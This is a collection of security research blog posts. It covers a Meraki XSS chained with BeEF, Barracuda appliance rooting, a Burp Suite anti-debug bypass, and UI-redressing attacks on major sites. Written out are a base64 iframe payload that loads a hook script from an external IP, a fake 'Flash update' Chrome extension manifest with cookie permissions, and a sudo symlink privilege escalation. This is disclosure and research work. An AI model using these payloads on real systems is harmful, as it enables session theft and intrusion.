Today, we are going to present a possible attack scenario based on a real-life vulnerability that has been recently patched by the Meraki team. Although the vulnerability itself isn't particularly interesting, it is revealing how a trivial XSS flaw can be abused to subvert an entire network infrastructure.

Meraki

Meraki is the first cloud-managed network infrastructure company and it's now part of Cisco Systems. The idea is pretty neat: all network devices and security appliances (wired and wireless) can be managed by a cutting-edge web interface hosted in the cloud, allowing Meraki networks to be completely set up and controlled through the Internet. Many enterprises, universities and numerous other businesses are already using this technology.

As usual, new technologies introduce opportunities and risks. In such environments, even a simple Cross-Site Scripting or a Cross-Site Request Forgery vulnerability can affect the overall security of the managed networks.

The vulnerability

During a product evaluation of a cloud managed Wireless Access Point, we noticed the possibility to personalize the portal splash page.  Users accessing your WiFi network can be redirected to a custom webpage (e.g. containing a disclaimer) before accessing Internet.

To further customize our splash page, we started including images and other HTML tags. With big surprise, we quickly discovered that just a basic HTML/JS validation was performed in that context. As a result, we were able to include things like:


What was even more interesting is the fact that the splash page is also hosted in the cloud. Unlike traditional WiFi APs where the page is hosted on the device itself, Meraki appliances use cloud resources.

https://n20.meraki.com/splash/?mac=XXXX&client_ip=XXXX&client_mac=XXXX&vap=0&a=XXXX&b=XXXX&auth_version=5&key=ef1115d... AUTH_KEY...d41c283&node_ip=XXXX&acl_ver=XXXX&continue_url=http%3A%2F%2Fwww.google.com

To protect that page from random visitors, a unique token is used for authentication. Assuming you provide the right token and other required parameters, that page is accessible to Internet users.

Now, let's add to the mix that Meraki uses a limited number of domains for all customers (e.g. n1-29.meraki.com, etc.) and, more importantly, that the dashboard session token is scoped to *.meraki.com. This factor turns the stored XSS affecting our own device's domain to a vulnerability that can be abused to retrieve the dashboard cookie of other users and networks. 

Attack scenario

An attacker with access to a Meraki dashboard can craft a malicious JS payload to steal the dashboard session cookie and obtain access to other users' devices. In practice, this allows to completely take over Meraki's wired and wireless networks.

BeEF, the well-know Browser Exploitation Framework, has been used to simulate a realistic attack:

  1. The attacker customizes the splash page of his/her WiFi AP with an arbitrary JS payload, which includes the BeEF hook 
  2. Connecting a device to the physical wireless network controlled by the attacker (e.g. a testing device), it is possible to retrieve the URL of the splash page including the unique token 
  3. Using social engineering, the attacker tricks the victim(s) into visiting the attacker-controlled splash page
  4. At this point, the victim browser is hooked in BeEF
  5. Using one of the available BeEF modules, the attacker can retrieve the HttpOnly dash_auth cookie and get access to the victim's Meraki dashboard 
  6. In the case of Meraki WiFi Access Point, a convenient map will display the position of the device. In the config tab, it is also possible to disclose the network's password. At this stage, the actual network can be fully controlled by the attacker

  

A demonstration video of the attack is also available:



For the interested readers, a few technical details are also shared:
  • Cookie flags (e.g. HttpOnly) are the ASLR/DEP of browser security. It is possible to bypass those mitigation techniques,  although it's getting more complex. Thanks to the progress of browser security and general awareness, stealing cookies marked as HttpOnly via JS payload isn't trivial anymore. Cross Site Tracing and similar techniques are obsolete. Browser plugins have been also patched. Besides exploiting specific servers or browsers bugs, attackers can only rely on social engineering tricks. During our Proof-of-Concept, a fake Flash update has been used to install a malicious Chrome extension and get access to all cookies
  • Chrome extensions run with different privileges than normal JavaScript code executed by the renderer. A Chrome extension can override default SOP restrictions and issue cross-domain requests reading the HTTP response, accessing other browser tabs, and also reading every cookie including those marked as HttpOnly. The manifest of the deliberately backdoored Chrome Extension is the following. The background.js file loads the BeEF hook.

    {
      "name": "Adobe Flash Player Security Update",
      "manifest_version": 2,
      "version": "11.5.502.149",
      "description": "Updates Adobe Flash Player with latest securty updates",
      "background": {
        "scripts": ["background.js"]
      },
      "content_security_policy": "script-src 'self' 'unsafe-eval' https://174.136.111.122; object-src 'self'",
      "icons": { 
        "16": "icon16.png",
        "48": "icon48.png",
        "128": "icon128.png" 
      },
      "permissions": [
    "tabs", 
    "http://*/*", 
    "https://*/*",
      "cookies"
      ]
    }

    Not to blame Google, but just FYI when the backdoored Chrome Extension was uploaded to Google Chrome Webstore, it was available straight after the upload. No checks were made by the application, for example to prevent the upload of an extension with very relaxed permissions, unsafe-eval CSP directive, and Name/Description fields containing an obviously fake content such as "Adobe Flash Update" 
  • Choosing Google Chrome as target browser required to bypass XSS Auditor, the integrated Anti-XSS filter. As discovered by Mario Heiderich, the data URI schema with base64 content can be leverage to bypass the filter. The following code snippet will trigger the classic alert(1), even on the latest Google Chrome at the time of writing (version 24.0.1312.71)


  • The final attack vector to inject the initial BeEF hook in Meraki's page is:

    <iframe src="data:text/html;base64,PHNjcmlwdD5zPWRvY3VtZW50LmNyZ
    WF0ZUVsZW1lbnQoJ3NjcmlwdCcpO3MudHlwZT0ndGV4dC9qYXZhc2Nya
    XB0JztzLnNyYz0naHR0cHM6Ly8xNzQuMTM2LjExMS4xMjIvaG9vay5qc
    yc7ZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoJ2hlYWQnKVswX
    S5hcHBlbmRDaGlsZChzKTs8L3NjcmlwdD4=">


    And what is actually executed is:

    <script> s=document.createElement('script'); s.type='text/javascript'; s.src='https://174.136.111.122/hook.js'; document.getElementsByTagName('head')[0].appendChild(s); </script>

    Having a backdoored Chrome Extension running in your browser opens for many new attack vectors wich we din't covered in the PoC. For example, it is possible to inject the BeEF hook in every open tab (you can get the impact of this :-), or use the victim browser as an open proxy using BeEF's Tunneling Proxy component and many other attacks

This blog post is brought to you by @_ikki (NibbleSec) and @antisnatchor (BeEF core dev team).
Thanks to Meraki for the prompt response and the great service.

February 04 2013

06:56

Effective AMF Remoting Message fuzzing with Blazer v0.3


After several weeks of extensive testing and debugging, Blazer v0.3 is finally out!
It's been a long ride since the first lines of code, back in 2011. In this post, I am going to present all new features and describe Tips&Tricks to make your AMF security testing even more effective.

If you are not familiar with Blazer, have a look at the project page: http://code.google.com/p/blazer/.
New to Burp Suite? Have a look at the video tutorials and consider to buy Instant Burp Suite Starter.

What's new?

Blazer v0.3 includes a few interesting new features presented during my DeepSec talk, but even more important is the result of extensive testing on Windows, Mac OS X and Linux using multiple Java Runtime Environments and recent Burp Suite releases.

  • Java classes and source code import feature
    In addition to JARs, it is now possible to import directories containing .class and .java files. The ability to import source code, in addition to application libraries, allows to partially use Blazer even during black-box security testing.
  • AMF request/response export functionality (AMF2XML)
    Sharing details of security vulnerabilities triggered by AMF messages was annoying, as it was not possible to export AMF requests and responses in an intelligible format. Using the AMF2XML feature, it is now possible to export those messages in a file or console.


  • Sandbox feature using a custom security manager 
    The rationale behind the introduction of this feature is to prevent any malicious action caused by application libraries. Blazer uses Java reflection and fairly complex heuristics to automatically instantiate and populate objects by using the application libraries. Application objects are created on the tester's computer and methods are locally invoked to populate attributes before sending the AMF message to the remote service. As a result, untrusted application libraries may end up writing files, opening network sockets or other involuntary IO operations.


  • Numerous bugs and performance issues fixed
    I've fixed more than 20 bugs and multiple performance issues, including an annoying GUI refresh bug on OS X and Windows. This version has been extensively tested on multiple platforms; I've specifically delayed the release to make sure that all issues I've encountered during my testing have been fixed.


BlackBox vs GrayBox testing with Blazer

Blazer is a security tool for gray-box testing. It has been designed and built with the assumption that the application libraries are available to the tester. All Java classes exchanged between client and server should be imported in the tool. This is a realistic assumption if you are doing vulnerability research, not if you are performing a standard pentest.

However, starting from this release, it is actually possible to partially use Blazer during black-box testing. If your application is using primitive types and libraries which can be downloaded from the Internet, you can benefit from Blazer's automatic objects generation by manually crafting a fake .java file including all method signatures:

1. Decompile the client-side Flex components (e.g. SWF files) or monitor the network traffic in order to enumerate all remote methods. Deblaze tool can be used for it. 

2. Create a .java file containing method signatures as observed in the traffic. Something like the following:
package flex.samples.product;
public class ProductService{
public Product getProduct(int prodId){}
3. In Blazer, import the crafted Java source file and all application libraries referenced in the application. At this stage, Blazer can be used to automatically generate objects and perform fuzzing.

Tips & Tricks 

Fuzzing complex applications containing multiple custom classes isn't trivial. To improve coverage and effectiveness, the following recommendations can save you precious time:

  • Always increment the amount of memory that your computer makes available to Burp Suite. If you are generating a large number of AMF messages, consider to chain two instances of Burp Suite. The first instance can be used to intercept the application requests and launch Blazer. In Blazer, set the proxy within tab 3 to point to the second Burp Suite instance. The latter will collect all requests generated by Blazer. In Burp Suite Pro, you can also set automatic backups to prevent any data loss.

  • As of Burp Suite v1.5.01, Burp Extender has a new API. Blazer has been improved to support both old and new Burp Extender APIs. Standard output and error can be displayed within Burp Extender, to a file or in the console screen. During testing, I suggest to redirect those streams to two separate files in order to record all operations and exceptions.

  • Balancing the number of permutations, attack vectors and probability is the magic sauce of Blazer. Read the original whitepaper/presentation, make sure to understand those settings and tune the tool. Even better, check the implementation of the ObjectGenerator class.

  • Divide et impera by breaking up numerous application method signatures into small groups. Start testing a few methods and make sure that you have imported all required application libraries. Finally, review the server responses and monitor the server's status to detect security vulnerabilities. For example - if you are looking for SQL injections - use Burp's filter by search term to identify AMF messages that triggered visible errors and grep for similar strings in the server logs. Blazer appends a custom HTTP header to all AMF requests that can be used to correlate message and method signature. Also, the newest export functionality can be used to review the AMF payload. 

  • Feel free to email me if you have any question.  Also, let me know if you find bugs using Blazer!

    January 25 2013

    10:13

    How to patch your Barracuda virtual appliance

    It's today's "news" about backdoors found in multiple Barracuda gears. Basically, Barracuda appliances have multiple hardcoded system accounts and firewall rules specifically designed to allow remote assistance. If you want more gossip, you can read about it on KrebsOnSecurity, The Register or The H Online.

    A new old story

    According to the original advisory, the bug was discovered on 2012-11-20 by Stefan Viehböck. Although Stefan did pretty interesting research in the past (e.g. WiFi WPS design bug), the Barracuda backdoor is really not a new story. Not only this issue was known, but it was even disclosed and discussed several times:
    Although it's natural to be surprised that such a critical issue has been underestimated for nine years, we should rather use this opportunity to stop these bad practices. Unfortunately, it's not just Barracuda - many vendors have adopted similar poorly-designed solutions for remote assistance. As customers, we should always evaluate products, pretend more accountability and transparency.

    Digital self-defense

    In 2011, while helping a friend during the setup of his network, I came across the advisory from 2004 and I started investigating.  After having confirmed the issue, I decided to patch the virtual appliance on my own. If you think that the mitigation provided by Barracuda in the security definition 2.0.5  is not adequate for your environment, keep reading. Hopefully, Barracuda will reconsider the situation and you won't need to manually patch your device.

    Disclaimer: Use this information at your own risk! 
    You may end up with a broken appliance and no more vendor warranty. Also, I am not a lawyer and I haven't reviewed the product EULA. Finally, note that this method has been tested against the Barracuda WebApp Firewall 660vxl (v7.5.0.x) virtual appliance only. 

    Patching your virtual appliance

    Removing system accounts and changing iptables configuration require privileged shell access. As the original techniques for rooting the device are now deprecated (at least in the device I had), I started looking for other ways to get a root shell. Soon, I realized that it's possible to abuse the recovery partition in order to include arbitrary resources. This technique requires "physical" access to the appliance and multiple reboots thus I consider it better than disclosing the root password and suggest you to abuse the backdoor in order to patch the device.

    Rooting the Barracuda WebApp Firewall requires a multi steps process:

    1) Boot the Barracuda virtual appliance with a standard Linux distribution (e.g. booting from the virtual CD) and mount the recovery partition (/dev/sda9) in order to copy the patcher script (rootme.sh).

    rootme.sh can be downloaded here
      
      $ mkdir /mnt/temp 
      $ mount /dev/sda9 /mnt/temp
      $ cp rootme.sh /mnt/temp/
      $ chmod 777 /mnt/temp/rootme.sh
      $ /mtn/temp/rootme.sh



      $ umount /mnt/temp
      $ reboot


    2) From the web console, revert the firmware to the factory installed version (Advanced-->Firmware Update-->Firmware Revert) and reboot again the appliance. If the factory Firmware Revert button is not available (it's gray and cannot be selected), you need to update the device to the newest firmware and repeat the entire process.

    3) Visit https://barracuda_ip/cgi-mod/rootme.cgiAfter that, you can connect via SSH to the device using a temporary root password. Removing the hardcoded system accounts and changing iptables is left as exercise.


    A few more technical details:

    • rootme.sh is simply used to copy rootme.cgi to the web console webroot in order to facilitate the rooting process
    • rootme.cgi is used to escalate privileges from the Apache user (nobody) to root, change the root password and the firewall rules in order to allow external access 
    • Privileges escalation is possible due to an insecure sudoers configuration. Again, nothing fancy. Please note that I have reported this misconfiguration to Barracuda on 09/12/2011.
       $ sudo mv /bin/ping /tmp/ping.old
       $ sudo ln -s /bin/bash /bin/ping
       $ sudo ping -c whoami


      January 14 2013

      06:15

      Anti-debugging techniques and Burp Suite

      Incipit

      No matter how good a Java obfuscator is, the bytecode can still be analyzed and partially decompiled. Also, using a debugger, it is possible to dynamically observe the application behavior at runtime making reverse engineering much easier. For this reason, developers often use routines to programmatically detect the execution under a debugger in order to prevent easy access to application's internals. Unfortunately, these techniques can be also extremely annoying for people with good intents.

       

      Burp Suite

      Over the course of the years, starting from the very first release, I have been an enthusiastic supporter of Burp Suite. Not only @PortSwigger was able to create an amazing tool, but he also built a strong community that welcome each release as a big event. He has also been friendly and open to receive feedback from us, ready to implement suggested features. Hopefully, he won't change his attitude now.

      Since a few releases, both Burp Suite Free and Pro cannot be executed under a debugger. Unfortunately, this is a severe limitation - especially considering the latest Extensibility API.  The new extensibility framework is a game-changer: it is now possible to fully integrate custom extensions in our favorite tool. But, how to properly debug extensions in an IDE? Troubleshooting fairly complex extensions (e.g. Blazer) requires lot of debugging. Setting breakpoints, stepping in and out of methods, ... are must-have operations.

      Inspired by necessity, I spent a few hours to review the anti-debugging mechanism used in Burp Suite Free. According to Burp's EULA (Free Edition), reversing does not seem to be illegal as long as it is "essential for the purpose of achieving inter-operability". Not to facilitate any illegal activity, this post will discuss details related to the Free edition only.  
      Disclaimer: Don't be a fool, be cool. If you use Burp Pro, you must have a valid license.

       

      Automatic detection of a debugger

      In Java, it is possible to enable remote debugging with the following options:

      -Xdebug -agentlib:jdwp=transport=dt_socket,server=y,address=8000,suspend=n 

      and attach a debugger with:

       jdb --attach [host]:8000

      A common technique to programmatically understand if a program is running under a debugger involves checking the input arguments passed to the Java Virtual Machine. The following is the pseudo-code of a very common technique:
       for(ManagementFactory.getRuntimeMXBean().getInputArguments() ...){
                      if(Argument.contains("-Xdebug") || Argument.contains("-agentlib") ...){
                         // Do something annoying for the user
                  }
      In practice, ManagementFactory returns the managed bean for the runtime system of the current Java Virtual Machine that can be used to retrieve the execution arguments (see RuntimeMXBean API for further details). In case of Burp Free, the application gets shutdown via a System.exit(0);

       

      Bypass techniques, an incomplete list

      First of all, it is always possible to attach the debugger once the Java process is already up and running. Any check performed during the application startup won't block the execution:   

      jdb -connect sun.jvm.hotspot.jdi.SAPIDAttachingConnector:pid=[Process ID]

      Unfortunately, this is a read-only mechanism and cannot be used within traditional IDEs. A few better solutions require tweaking the application in order to modify the program execution. This can be achieved via static changes in the .class files or using static/dynamic bytecode instrumentation. The code above is pretty simple and can be bypassed in several ways:
      • Using ClassEditor, reJ or any other tool that allow .class manipulation, it is just necessary to identify all strings in the constant pool used during the string comparison within the if-statement. For instance, you could replace all strings with a bunch of "a" so that the program won't even enter in the if-statement body
      Manually changing the Constant Pool of a .class file


      •  An even more portable solution, especially when strings obfuscation is used, consist of editing the bytecode using JavaAssist or similar libraries. This allows to write a piece of code that search a class and patch it:
        • For instance, we could force the getInputArguments() to return an empty List;
        • Or, we could insert an arbitrary unconditional jump jsr to skip the program shutdown;
        • Or again, it is possible to override the System.exit() method with a local method using an empty body. First, we need to create a fake static exit(int) method. Then, we replace System.exit() with the custom method within our class.
      Using JavaAssist to replace an existent method within a Class

      Patching Burp Free for debugging your custom extensions

      With the honest intent to simplify the life of coders writing custom Burp's extensions, I have developed a small utility (BurpPatchMe) to patch your own copy of Burp Free - which will allow you to debug your code in NetBeans, Eclipse, etc.
      BurpPatchMe
        A few important details:
        • BurpPatchMe works for Burp Suite Free only. I have included a specific check for it as well as I have used a technique compatible with that release only. Again, you won't be able to remove debugging in Burp Suite Pro using this tool. Go and buy your own copy of this amazing tool!
        • BurpPatchMe is compiled without debugging info and it has been obfuscated too. A quick skiddie prevention mechanism to avoid abuses
        • BurpPatchMe does not contain any Burp's code, library or resource. It is your own responsability to accept the EULA agreement and its conditions, before downloading Burp Free. Also, this tool is provided as it is - please do not send emails/comments asking for "features"
        • Java JDK is required in order to use this tool. All other dependencies are included within the jar
      You can download BurpPatchMe here and launch it with:
      $ java -jar BurpPatchMe.jar -file burpsuite_free_v1.5.jar   
       Long life Burp Suite and happy extensions!

      December 31 2012

      21:06

      UI Redressing Mayhem: Identification Attacks and UI Redressing on Google Chrome

      Today I'm going to disclose a series of UI Redressing issues that could be exploited in order to extract information that may help an attacker to identify a victim-user whenever anonymity is a critical requirement. Moreover, a new extraction method, which has been successfully applied against Google Chrome, will be presented. Google's web browser disallows cross-origin drag&drop and what I'm introducing here is a completely different approach to achieve the extraction of potentially sensitive data.

      Identification Attacks


      I found that several world-renowned web applications lack protection of web resources from UI Redressing attacks, thus revealing data that can be abused to disclose a user's identity. An identification attack could be successfully performed by exploiting a UI Redressing flaw affecting web resources that include, for example, the name or the e-mail address of the victim.

      A series of vulnerabilities are presented below in order to exemplify some of these attacks. The first issue affects a Google's web application: an authenticated Google user can be attacked by abusing a UI Redressing vulnerability related to the support.google.com domain. As shown in Figure 1, no X-Frame-Options header is adopted, thus allowing the cross-domain extraction of personal data such as:
      • Victim's e-mail address;
      • Victim's first and last name;
      • Victim's profile picture URL.
      Figure 1 - Google Support vulnerable to UI redressing attacks.
      A Proof of Concept exploit can be downloaded here. The following is a video demonstrating the attack:



      Similar vulnerabilities have been found on other popular web applications. The following is a list of identified vulnerable web resources, exposing user's data:

      Microsoft Profile (First name, last name, e-mail address, etc - Figure 2)
      Figure 2 - Microsoft Profile web resource vulnerable to UI Redressing attacks.
      Yahoo! (e-mail address, first name, birth date, sex, etc - Figure 3):
      Figure 3 - Yahoo! web resource vulnerable to UI Redressing attacks.

       

      Beyond the iframe-to-iframe extraction method


      The Google Chrome web browser seems to have defeated any extraction methods, denying the use of the view-source handler and disallowing cross-origin drag&drop. Despite these adverse conditions, I identified some attack scenarios where a UI Redressing issue could be still performed in order to extract sensitive data. Once again, the method is extremely simple. Instead of a cross-origin drag&drop, the victim is tricked to perform a same-origin action, where the dragged content belongs to a vulnerable web page of the targeted application and the "dropper" is a form (text area, input text field, etc.) located on the same domain. Using a site's functionality that allows publishing externally-facing content, it is still possible to extract information. Under these circumstances, Chrome will not reasonably deny the same-origin drag&drop, thus inducing the victim to involuntary publish sensitive data. As a matter of fact, the attacker is exploiting a subsequent clickjacking vulnerability on the same domain, which causes the publication of the personal information. I refer to this kind of attack chain as a "bridge" that allows the attacker to move sensitive data from being private to public, while remaining on the same domain. Then, the attacker can simply access the (now) public information to obtain the extracted data. It should be outlined that the technique requires two vulnerabilities: a web resources that is not protected by the X-Frame-Options (or uses a weak frame-busting code) and a site's functionality that is affected by clickjacking.

      The following list summarizes a series of functionalities that could be abused to extract the sensitive data:
      • Forum's post mechanism;
      • "comment this item" functionalities;
      • Public profile information updating function (or any "update function" that involves public available data - e.g. administrative functions that cause the updating of the web site's content);
      • Messaging functionalities (e.g. from the victim to the attacker);
      The proposed method has been successfully applied against Google Chrome version 23.0.1271.97, targeting the Amazon web application. Amazon exposes a series of web resources that include user's data - such as the name, e-mail address, mobile number and "address book" details - that are not protected with both X-Frame-Options header or any frame-busting mechanism. As an example, the following vulnerable URL includes Amazon's user first name, last name and e-mail address:
      A second issue on the comment function - our "bridge" - can be abused to publish the user's information as a comment for an Amazon item (e.g. a book), previously known by the attacker, and whose comments are "monitored". The following steps summarize the exploitation phases:
      1. The exploit frames both the vulnerable URL and the comment form of a attacker-chosen Amazon's book;
      2. The victim is triggered to drag his data and drop the information to the framed comment form;
      3. A clickjacking attack is then performed against the "Post" mechanism, in order to publish the dropped data;
      4. At that point the attacker can access all personal details by simply visualizing the submitted comment of the Amazon's item.
      The exploit code can be download here, while the following is a video of the described attack:

      December 19 2012

      11:15

      UI Redressing Mayhem: HttpOnly bypass PayPwn style

      In the previous post, a new cross-domain extraction method - affecting the latest version of the Mozilla Firefox browser - has been presented. The iframe-to-iframe technique was successfully used in a UI Redressing attack affecting LinkedIn. Today, I'm introducing an instance of the aforementioned method that involves a known Apache Web Server security issue, in order to steal session cookies that are protected by HttpOnly flag, thus allowing the attacker to perform Session Hijacking attacks. A new attack targeting PayPal systems will be also presented.

      CVE-2012-0053: HttpOnly bypass and beyond


      In January 2012 - even if the Apache defect was known and exploited for a while - Norman Hippert disclosed CVE-2012-0053 bug affecting the Apache Web Server. The software was not able to correctly restrict an header field information disclosure in case of overlong or malformed HTTP requests. The vulnerability could be effectively combined with a Cross-Site Scripting attack to bypass the protection mechanism introduced by the HttpOnly flag and steal any session token stored as cookies value. Infact, an XSS vector could manipulate the document.cookie object to set an overlong cookie field, and forward a malformed request to the affected Apache Web Server with the intention to trigger the error message and extract the desiderated session cookies. The Apache bug can be abused in a series of attack scenarios such as the following:
      • Bypassing HttpOnly flag with a XSS vulnerability on the same domain that is affected by the CVE-2012-0053;
      • Bypassing the limitation introduced by cookie path whereas the XSS vulnerability affects a web resources that resides outside the defined path itself;
      • Bypassing HttpOnly flag if a XSS vulnerability is found on any subdomains of the host that is affected by the Apache disclosure issue, if exploited in conjunction with a UI Redressing attack - that allows the cross-domain content extraction of the information included in the triggered Apache error message.
        It should also be noted that the Apache Web Server is often used as a reverse proxy configuration. As a result, any session object on any server-side technology, could be attacked with the described vectors.

        Smashing PayPal for Fun but.. NO Profit

         

        During my security research on UI Redressing attacks I found multiple PayPal subdomains (e.g. https://b.stats.paypal.com) affected by the Apache disclosure bug as detailed in Figure 1 and Figure 2.

        Figure 1 - HTTP request with the overlong cookie. Figure 2 - Apache error message with the disclosure of the malformed Cookie header.
        Despite in the first instance the bug could appear as useless, I found that the PayPal application - www.paypal.com - delivers the session cookies defining the domain to .paypal.com (Figure 3 and Figure 4).

        Figure 3 - Post-authentication cookies delivery.
        Figure 4 - Cookies delivered to the personal.paypal.com subdomain.

        The highlighted security issues could be abused to attack authenticated PayPal users, implementing the mentioned UI Redressing attacks combined with the cookie disclosure bug. But.. I had a problem: I had no XSS vulnerability on any PayPal web application - not that there're not! I was able to circumnavigate the limitation identifying another vulnerability on a different PayPal subdomain, that allowed me to define a monster cookie with a single HTTP request. As first, please note the following URL:
        As detailed in Figure 5, the navigation of the above URL involves the setting of the cookie named navcmd and then a bit of client-side black magic defines two new cookie fields named s_sess and s_pers (Figure 6) that complete the desiderated malformed HTTP request.

        Figure 5 - Cookie defined with attacker-controlled input.
        Figure 6 - Final monster cookie.

        7350PayPwn

         

        The exploitation is now trivial. The following are the logical steps implemented by the Proof of Concept exploit:
        1. The exploit triggers the victim to open an under pop (Figure 7) web page that generates the monster cookie - with domain=.paypal.com - involving the history.paypal.com application;
        2. The https://b.stats.paypal.com is then framed thus inducing the forward of a malformed HTTP request that triggers the disclosure of the Cookie header, containing the PayPal account's session cookies;
      • The malicious page allows the victim to play the d&d game with the extraction of the secret session cookies.


      • Figure 7 - Pop-under page with the navigation of the monster cookie's generation URL.

        The attacker now holds the cookies that can be used to perform a Session Hijacking attack against the victim's PayPal account. A working Proof of Concept has been developed and can be download here. The following is a video that illustrates the described attack:

        December 18 2012

        23:31

        UI Redressing Mayhem: Firefox 0day and the LeakedIn affair

        In the past weeks I worked on UI Redressing exploitation methods. The UI Redressing Mayhem series is going to illustrate the results of my research, presenting 0day exploiting techniques and several vulnerabilities that involve high-profile web applications. Each post of the series will also provide detailed information about the vulnerabilities and techniques, together with working Proof-of-Concept exploits.

        The following article will detail a previously unknown Mozilla Firefox  vulnerability that affects the latest version (v.17.0.1) of the Mozilla web browser and allows malicious users to perform cross-domain extraction of sensitive data via UI Redressing vectors.

        It was a dark and stormy night...


        My security research on UI Redressing exploitation techniques grounds its roots in a web application penetration test where I was asked to exploit a UI Redressing bug with the explicit constraints to target Mozilla Firefox users. My objective was to achieve the cross-domain content extraction of an anti-CSRF token, in order to trigger the update of the victim's profile e-mail address: the powerful double drag&drop method was found to be appropriate in that context. To the best of my knowledge, the method was first introduced by Ahamed Nafeez and is based on the possibility to perform a drag&drop action between a framed web page, which displays the "sensitive" contents and is not protected by the X-Frame-Options header, and the framing page (the "dropper" page), which receives and stores the extracted content. The view-source handler is used here to bypass any framebusting code.

        The main problem with my exploit development, during the penetration test, was that the drag&drop method was recently killed by Mozilla. An interesting solution to the Mozilla fix is the fake CAPTCHA method that was introduced by Krzysztof Kotowicz — and demonstrated to be effective against Facebook and Google eBookstore — but I chose the hard way and tried to bring the drag&drop method back to the masses: so please welcome the iframe-to-iframe cross-domain extraction method.

        The iframe-to-iframe extraction method


        The extraction method is extremely simple: instead of performing a drag&drop action of sensitive data, from a framed vulnerable web page to the framing one (attacker-controlled), the victim is tricked to visit a malicious html page that includes two iframes: the vulnerable page - where the sensitive content resides - and another attacker's page that is used to drop the extracted content (Figure 1). Firefox is not able to block this kind of attack because no check on cross-domain drag&drop between iframes is performed. As mentioned before, the method was tested against Mozilla Firefox version 17.0.1 - the latest stable release at the time of writing. The iframe-to-iframe technique was also tested against Google Chrome but the browser has been proved robust to the proposed attack.
        Figure 1 - iframe-to-iframe d&d extraction method. The iframe-to-iframe method re-introduces the possibility to abuse the Firefox drag&drop mechanism to perform a cross-domain data extraction. Let me now introduce an high-profile vulnerability and attack that targets the LinkedIn application implementing the proposed method.

        All your LinkedIn accounts are belong to us


        LinkedIn implements a stateless anti-CSRF mechanism that associates tokens to the HTTP requests that result in a change of the remote application state, such as the update of a user's profile information (e.g. job title or the login e-mail address). A stateless anti-CSRF method is generally based on a secret token, delivered as a cookie parameter, and a token which is included in every state-changing HTTP request: the remote web application considers as genuine exclusively the HTTP requests that have the same token value for both the cookie and HTTP parameter. Otherwise, a request is considered untrusted and it is not computed. The LinkedIn's anti-CSRF mechanism involves a cookie parameter called JSESSIONID and an HTTP parameter named csrfToken in order to store the secret tokens (Figure 2). A stateless mechanism can be easily bypassed with well known web hacking techniques.
        Figure 2 - anti-CSRF tokens. For example, the attacker could abuse a Cross-Site Scripting issue on both www.linkedin.com or any LinkedIn's subdomains to poison the cookie parameter JSESSIONID and bypass the mechanism — this attack is also known as Cookie Tossing. During my security research I found a vulnerable LinkedIn's page that includes the anti-CSRF token within the HTML code, despite not being protected by the X-Frame-Options header. Under these circumstances, the iframe-to-iframe method can be used to attack authenticated LinkedIn users and steal their secret token in order to perform different kind of malicious actions on the victim's profile. The following URL refers to the LinkedIn vulnerable web resource as detailed in Figure 3:

        Figure 3 - Vulnerable LinkedIn web resource.
        The vulnerability can be easily abused to craft a UI Redressing exploit that triggers the victim to drag&drop the anti-CSRF token. The token can then be abused to edit any information on the victim's profile and even to reset the account password. In order to demonstrate the effectiveness of the attack I developed a fully working Proof of Concept exploit that adds the attacker's e-mail as a trusted address to the victim's profile and verifies the e-mail itself. At that point, the attacker can easily reset the victim's password using LinkedIn password reset mechanism.

        The following are the logical steps implemented by the Proof of Concept exploit:
        1. The malicious page frames both the LinkedIn vulnerable page and the attacker-controlled "dropper" page;
        2. The malicious page allows the victim to play the d&d game, which extracts the anti-CSRF token;
        3. The malicious page can now bypass the anti-CSRF protection and adds a new e-mail address to the victim's profile. The action involves the forwarding of a confirmation e-mail from LinkedIn system to the attacker box: an activation URL is included;
        4. The exploit interacts with an attacker's script — /linkedin/linkedin.php — which accesses the attacker's mail box via IMAP and waits for the Linkedin activation e-mail. Once obtained the e-mail, the URL is returned back to the malicious page, which is still loaded by victim's web browser;
        5. The script can now simulate the navigation of the fetched URL in order to confirm the new address.
        The attacker can now reset the victim's account password abusing the password reset functionality, where he will type the e-mail address previously added to the targeted profile. Figure 4 highlights the different HTTP requests exchanged between the attacked web browser, the attacker's servers and the LinkedIn web application, in order to achieve the password resetting.
        Figure 4 - Sequence diagram detailing the attack. A working PoC has been developed and can be downloaded here. The following is a video of the attack:


         

        Beyond the Mayhem


        LinkedIn Team was informed about this attack scenario. The following are a series of suggestions that should prevent this kind of attacks:
        • Protect every web resource that includes anti-CSRF tokens with the X-Frame-Options header. Nowadays, this mechanism is available in all major browsers;
        • Consider to adopt a stateful anti-CSRF mechanism that should not perform the validation on the basis of potentially attacker-controlled inputs.

        July 25 2012

        22:54

        Discontinued

        After 2 years, I'm convinced I will not get back to posting to this blog. Accordingly, Oversighting is now officially discontinued. I'm leaving the article online as they might be useful for someone in the future, but won't post any more updates.
        22:51

        Can we eat the apple?

        As IT professionals, we are used to love-hate relationships. We invented Perl and LISP, so we know what we're talking about. But it's seems Apple is a white cow in a black herd.
        In a recent article on his blog (then blogged on Ars Technica) Vladimir Vukicevic revelead he found undocumented API in Apple's framework.
        While I don't think this is malicious behaviour in itself, think for a moment about Microsoft doing the same thing, and the following reactions.
        Instead, the thing went almost unnoticed.
        It's hard to hate Apple, or even to be angry with that company: Apple is innovating every day, doing amazing research, and is cool whereas Microsoft is not. And I did not mention the iPhone, the iPod and so on.
        But then, Apple is cheating,not releasing SDKs and in general acting like it could not care the less about fair play and the community.
        How long before we realize
        22:51

        How to use google analytics on soup.io

        I'm running a soup blog for personal entertainment: soup.io is a great service for fast, quick blogging and has a great team, but it's missing statistics.
        So, I've used google analytics. Here's how:

        • Create a Google Analytics account

        • Copy the tracking javascript (new version)

        • Edit your soup description

        • Enter html mode

        • Paste the javascript code inside the description, then save.


        Here you are, google analytics up and running.
        I think you should not edit the description again, but I'm not sure.
        22:51

        Web 2.0 IDEs

        How should we develope for the Web 2.0? That's an interesting question: as of today we lack methodologies,testing tools and a proper development environment for the web. That's it, if you go through the smoke: while any C developer can start coding and debugging in less than an hour from a clean system, most PHP developers are still stuck with echo and similar "debug stuff" from the 70s. If you look at java things get only slightly better: while you can have debugging for some part of the code, the ecosystem around J2EE is so crowded it's almost impossible to have proper methodologies.
        But the real nightmare is the frontend. I know CSS/JS gurus coding with Emacs! While Emacs is a very nice operating system, it's unbelievable there's nothing better out there.
        The idea of this post came from the recently announced release of the new version of WaveMaker visual studio, a "drag and drop" IDE for Ajax powered websites.
